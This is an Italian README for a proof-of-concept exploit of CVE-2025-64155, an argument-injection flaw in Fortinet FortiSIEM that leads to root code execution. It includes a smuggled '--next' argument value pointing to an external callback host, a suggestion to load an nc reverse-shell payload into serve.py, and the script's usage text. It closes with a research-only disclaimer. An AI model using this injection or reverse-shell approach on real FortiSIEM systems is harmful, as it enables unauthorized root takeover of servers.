
CVE-2025-64155: Iniezione di argomenti in Fortinet FortiSIEM verso esecuzione di codice remoto
Proof of concept per Fortinet FortiSIEM che sfrutta un'iniezione di argomenti per scrivere un file e ottenere l'esecuzione di codice come root
Analisi approfondita qui: Horizon3.ai - CVE-2025-64155: Three Years of Remotely Rooting the Fortinet FortiSIEM
Lo sfruttamento di questo problema per sovrascrivere file dell'applicazione potrebbe causare instabilità del sistema. Usare con cautela. I controlli possono essere eseguiti in modo innocuo modificando cluster_url in: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py con il payload desiderato (es. reverse shell nc)serve.pyCVE-2025-64155.py% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è inteso per attaccare sistemi se non esplicitamente autorizzati. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.